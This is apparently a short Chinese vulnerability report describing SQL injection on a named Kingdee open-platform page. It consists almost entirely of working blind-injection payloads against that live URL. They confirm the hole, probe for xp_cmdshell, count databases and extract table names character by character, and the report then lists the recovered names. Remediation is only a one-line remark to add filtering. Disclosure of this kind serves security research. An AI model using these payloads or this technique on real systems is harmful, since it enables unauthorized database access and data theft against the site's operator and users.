金蝶某分站存在SQL注入注入点:http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=1
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=2
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=(Select/**/count(*)/**/FROM/**/master.dbo.sysobjects/**/Where/**/xtype='X'/**/AND/**/name='xp_cmdshell') 正常返回,xp_cmdshell存在
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/(select/**/count(*)/**/from/**/master.dbo.sysdatabases)=7 (7个数据库)
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and len((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'))=21 (第一个数据库名字的长度为21)
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and ASCII(substring((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'),1,1))=84 (第一个数据库名字的第一个字符为T,依次猜解出数据库的名字)
http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/ substring((select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'),1,21)='T_ORG_ORGANIZATIONS_L' (第一个数据库名字:T_ORG_ORGANIZATIONS_L)
猜出的库名:
T_ORG_ORGANIZATIONS_L、T_KDS_RPT_L、Z_CDP_HISTORYAUTHORIZE_R、T_ORG_PRECHANGERULEENRY、T_ORG_PRECHANGERULEENTRY、T_BD_PRODUCTMODEL、T_META_FORMBILLLIST
注入存在性:
写脚本跑了一下库名:
漏洞修补方案:赶快过滤吧